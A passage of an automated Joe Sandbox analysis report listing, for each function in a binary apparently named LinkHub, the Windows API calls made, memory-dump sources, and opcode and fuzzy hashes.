                                                                    • CoCreateInstance.OLE32(002E0CC4,00000000,00000001,002E0B34,?), ref: 002B7095
                                                                    • CoUninitialize.OLE32 ref: 002B7319
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 886957087-24824748
                                                                    • Opcode ID: 0d090e552625aa3f770f78da15ad629734588b77fa2c4e018447e200e092ade3
                                                                    • Instruction ID: d507c66fe47fc3c5ee166e39815abfdae46d66e03f91c4148ca481009101ca01
                                                                    • Opcode Fuzzy Hash: 0d090e552625aa3f770f78da15ad629734588b77fa2c4e018447e200e092ade3
                                                                    • Instruction Fuzzy Hash: 0FD17971528201AFD304EF24C881EABB7E8FF98748F40496DF5858B262DB71ED55CB92
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0029FBEF,00000000,?,?,00000000,?,002839E2,00000004,00000000,00000000), ref: 002D8CA7
                                                                    • EnableWindow.USER32(?,00000000), ref: 002D8CCD
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 002D8D2C
                                                                    • ShowWindow.USER32(?,00000004), ref: 002D8D40
                                                                    • EnableWindow.USER32(?,00000001), ref: 002D8D66
                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 002D8D8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: 45d5325dd3147bb0e499e16e2ab0c0893e03b9bb623ac995defe53a7d9024b67
                                                                    • Instruction ID: ae041ad6ee9e1a5521c9d3a722e9f91b928a66dda789ea974a2f64b300a1fbf4
                                                                    • Opcode Fuzzy Hash: 45d5325dd3147bb0e499e16e2ab0c0893e03b9bb623ac995defe53a7d9024b67
                                                                    • Instruction Fuzzy Hash: 6A418430612645EFDB2ADF24D889BE67BF5FB49704F1440ABE5084B3A2DB31AC65CB50
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 002C2D45
                                                                      • Part of subcall function 002BEF33: GetWindowRect.USER32(?,?), ref: 002BEF4B
                                                                    • GetDesktopWindow.USER32 ref: 002C2D6F
                                                                    • GetWindowRect.USER32(00000000), ref: 002C2D76
                                                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 002C2DB2
                                                                    • GetCursorPos.USER32(?), ref: 002C2DDE
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002C2E3C
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                    • String ID:
                                                                    • API String ID: 2387181109-0
                                                                    • Opcode ID: caf65d8e4dd3325a585ec2dacef553f27d169f6ec4245b306d217d3006f64c6f
                                                                    • Instruction ID: f08ac75db1ac642be6b8dcf7a814f5981578aa779a1d9bcc9c9c9a67d05c4d45
                                                                    • Opcode Fuzzy Hash: caf65d8e4dd3325a585ec2dacef553f27d169f6ec4245b306d217d3006f64c6f
                                                                    • Instruction Fuzzy Hash: 10310072915716ABD720DF14E849F9BB7A9FF85314F000A1EF885A7181DB30E918CBE2
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 002A55F9
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002A5616
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002A564E
                                                                    • _wcslen.LIBCMT ref: 002A566C
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002A5674
                                                                    • _wcsstr.LIBVCRUNTIME ref: 002A567E
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 72514467-0
                                                                    • Opcode ID: 22c24c4573045257bdb9909ea9a0d8dc67ec310f9c75c7214e49a0d4cf134af6
                                                                    • Instruction ID: ee93eae1836210a3fce9dfd5fdc9a82602d28cb47c304240728f0395c5661f21
                                                                    • Opcode Fuzzy Hash: 22c24c4573045257bdb9909ea9a0d8dc67ec310f9c75c7214e49a0d4cf134af6
                                                                    • Instruction Fuzzy Hash: 4E213B31614510BBEB155F34EC49E7F7BACDF46B10F14406AF909CA091EFA0DC919AA0
                                                                    APIs
                                                                      • Part of subcall function 00245851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002455D1,?,?,00284B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00245871
                                                                    • _wcslen.LIBCMT ref: 002B62C0
                                                                    • CoInitialize.OLE32(00000000), ref: 002B63DA
                                                                    • CoCreateInstance.OLE32(002E0CC4,00000000,00000001,002E0B34,?), ref: 002B63F3
                                                                    • CoUninitialize.OLE32 ref: 002B6411
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 3172280962-24824748
                                                                    • Opcode ID: 634e68c8589c6560f9e2751d6a51e31e81dcbcf204207f30236331872eaa7c92
                                                                    • Instruction ID: 1b5bb0959054691db847a0eb505bf547171c9e5dee5228907ee2ae051421881a
                                                                    • Opcode Fuzzy Hash: 634e68c8589c6560f9e2751d6a51e31e81dcbcf204207f30236331872eaa7c92
                                                                    • Instruction Fuzzy Hash: 91D15270A242019FC714EF24C488A6ABBE6FF89754F14889DF8859B361CB35EC55CF92
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,002636E9,00263355), ref: 00263700
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0026370E
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00263727
                                                                    • SetLastError.KERNEL32(00000000,?,002636E9,00263355), ref: 00263779
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: d697d1c45203d1bb970e04eb1be936eb4a04f15307201bd7c3294816097b4eed
                                                                    • Instruction ID: 002d3537620faee72ba54c4928ba8ad7b3147cf9a09a4c7ab9175d8955ab856a
                                                                    • Opcode Fuzzy Hash: d697d1c45203d1bb970e04eb1be936eb4a04f15307201bd7c3294816097b4eed
                                                                    • Instruction Fuzzy Hash: 9A0128B257B7126EE626ABF4BCD657667D8EB05771B30022BF114410F0EF524DA19940
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00272908,00309B48,0000000C,00263268,00000001,?,?), ref: 002730EB
                                                                    • _free.LIBCMT ref: 0027311E
                                                                    • _free.LIBCMT ref: 00273146
                                                                    • SetLastError.KERNEL32(00000000), ref: 00273153
                                                                    • SetLastError.KERNEL32(00000000), ref: 0027315F
                                                                    • _abort.LIBCMT ref: 00273165
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    • Opcode ID: 9005299fa76222400fffe46f4f0cd1009b38f99b2fbb9b8dbe3a97f1aa584ede
                                                                    • Instruction ID: ccde42561b7a40c141335486ee1bc5aa42ac7d15d35d5c46b64c8a012b96d3ea
                                                                    • Opcode Fuzzy Hash: 9005299fa76222400fffe46f4f0cd1009b38f99b2fbb9b8dbe3a97f1aa584ede
                                                                    • Instruction Fuzzy Hash: BBF02D36931911B7C222BB39BC0BA9E13599FC5770F61C019F91CD21D1EF308D266961
                                                                    APIs
                                                                      • Part of subcall function 00241F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00241F87
                                                                      • Part of subcall function 00241F2D: SelectObject.GDI32(?,00000000), ref: 00241F96
                                                                      • Part of subcall function 00241F2D: BeginPath.GDI32(?), ref: 00241FAD
                                                                      • Part of subcall function 00241F2D: SelectObject.GDI32(?,00000000), ref: 00241FD6
                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 002D94AA
                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 002D94BE
                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 002D94CC
                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 002D94DC
                                                                    • EndPath.GDI32(?), ref: 002D94EC
                                                                    • StrokePath.GDI32(?), ref: 002D94FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                    • String ID:
                                                                    • API String ID: 43455801-0
                                                                    • Opcode ID: 02857dd3754f01a7e70f2291856b591a8144440e603c0c0ed953c7ad247d5cc7
                                                                    • Instruction ID: b34508a7e52058c56a1ae0a62c8b92badfcf1fa7bafb7f3f8112eb04245cdba3
                                                                    • Opcode Fuzzy Hash: 02857dd3754f01a7e70f2291856b591a8144440e603c0c0ed953c7ad247d5cc7
                                                                    • Instruction Fuzzy Hash: 41111B7240114DBFDF029F94EC88FDA7F6DEB08361F00C022BA194A1A1C771AD65DBA0
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 002A5B7C
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 002A5B8D
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002A5B94
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 002A5B9C
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002A5BB3
                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 002A5BC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 8050fd9bc791cb6787b0ea73102ef76aeaffb60f743e4a9869598e3e023017ef
                                                                    • Instruction ID: 2c5cd826602a2cf46f6d8df58654c2359a6e54cbed479fdac43097d7291b2747
                                                                    • Opcode Fuzzy Hash: 8050fd9bc791cb6787b0ea73102ef76aeaffb60f743e4a9869598e3e023017ef
                                                                    • Instruction Fuzzy Hash: 42012175E41719BBEB109FA5AC49E4A7F68EB49751F044066EA09A7280D6709C11CBA0
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002432AF
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 002432B7
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002432C2
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002432CD
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 002432D5
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 002432DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: ab62c550279c2676158d090bbc6a8a26d798d52dcf9fc54e4fd0362429d68735
                                                                    • Instruction ID: 24a3c6037b0e8720c8aad3ecb08ae5e008e8eb717268f40343c3948342adf0de
                                                                    • Opcode Fuzzy Hash: ab62c550279c2676158d090bbc6a8a26d798d52dcf9fc54e4fd0362429d68735
                                                                    • Instruction Fuzzy Hash: 070167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5AC64CBE5
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002AF447
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002AF45D
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 002AF46C
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002AF47B
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002AF485
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002AF48C
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 1a785ebd1693eb9df32f08ff90c1bf31bea7662dbe7a3983de277be08f9cbf59
                                                                    • Instruction ID: 96f1d1cbe4298523b73879cbf03df0bb729bf61cd375d08e1b2e9ec06a0f4c6a
                                                                    • Opcode Fuzzy Hash: 1a785ebd1693eb9df32f08ff90c1bf31bea7662dbe7a3983de277be08f9cbf59
                                                                    • Instruction Fuzzy Hash: 70F03036642958BBE7215B62AC0EEEF7B7CEFC6B11F00005AF60591090D7A45E01D6B5
                                                                    APIs
                                                                    • GetClientRect.USER32(?), ref: 002834EF
                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00283506
                                                                    • GetWindowDC.USER32(?), ref: 00283512
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00283521
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00283533
                                                                    • GetSysColor.USER32(00000005), ref: 0028354D
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                    • String ID:
                                                                    • API String ID: 272304278-0
                                                                    • Opcode ID: e7f3e23423a7e1ac6565c51e7f6cce7845a8d9779bcee738b597f6d83b3a9511
                                                                    • Instruction ID: 4688575dd2f08f44f510570e2952fd2e1522bf002da693d45fffc6ada2de16b4
                                                                    • Opcode Fuzzy Hash: e7f3e23423a7e1ac6565c51e7f6cce7845a8d9779bcee738b597f6d83b3a9511
                                                                    • Instruction Fuzzy Hash: 4B01AD31912505EFDB10AF60EC08FEA7BB5FF08720F900161F92AA21E0CB311E61AF50
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002A21CC
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 002A21D8
                                                                    • CloseHandle.KERNEL32(?), ref: 002A21E1
                                                                    • CloseHandle.KERNEL32(?), ref: 002A21E9
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 002A21F2
                                                                    • HeapFree.KERNEL32(00000000), ref: 002A21F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: 5c43e844c49075f260e7f1dfac3d18523d84d5bf31d0c8eb86003e31c5bdf9d6
                                                                    • Instruction ID: 22fe1aa1fddbff40142912ed8806b0a09692f46d17b7f87fb6cf1ee1e25411b6
                                                                    • Opcode Fuzzy Hash: 5c43e844c49075f260e7f1dfac3d18523d84d5bf31d0c8eb86003e31c5bdf9d6
                                                                    • Instruction Fuzzy Hash: 7AE0E57A405945FBDB012FA1FC0C90ABF39FF49322B104222F22982070CB329820DF50
                                                                    APIs
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 002CB903
                                                                      • Part of subcall function 002441EA: _wcslen.LIBCMT ref: 002441EF
                                                                    • GetProcessId.KERNEL32(00000000), ref: 002CB998
                                                                    • CloseHandle.KERNEL32(00000000), ref: 002CB9C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                    • String ID: <$@
                                                                    • API String ID: 146682121-1426351568
                                                                    • Opcode ID: ed65318ab60d0f10809e0c94b4f7c294ef4fb308ebfc22318f709f4d947e59b2
                                                                    • Instruction ID: 485d0e5501315f2fd36f57a0823b95cf52243333d8756b223185e7979e1965ff
                                                                    • Opcode Fuzzy Hash: ed65318ab60d0f10809e0c94b4f7c294ef4fb308ebfc22318f709f4d947e59b2
                                                                    • Instruction Fuzzy Hash: 88717674A20615DFCB15EF64C485A9EBBF4BF08300F048599E85AAB362CB74ED65CF90
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002A7B6D
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002A7BA3
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002A7BB4
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002A7C36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                    • String ID: DllGetClassObject
                                                                    • API String ID: 753597075-1075368562
                                                                    • Opcode ID: 37d5254cf1c2fe5778833c02d38ce0a0eb1b5553be10307e7b09f24deca65c2e
                                                                    • Instruction ID: f7a7f95a51420e3d7f25a75419c7ccd6d71cf160709eb92c131902250b1aa4ad
                                                                    • Opcode Fuzzy Hash: 37d5254cf1c2fe5778833c02d38ce0a0eb1b5553be10307e7b09f24deca65c2e
                                                                    • Instruction Fuzzy Hash: FF41C371614205DFDB15DF24DC88A9ABBBAEF45324F1080AEE8059F205DBB0DD54CBA4
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D48D1
                                                                    • IsMenu.USER32(?), ref: 002D48E6
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D492E
                                                                    • DrawMenuBar.USER32 ref: 002D4941
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
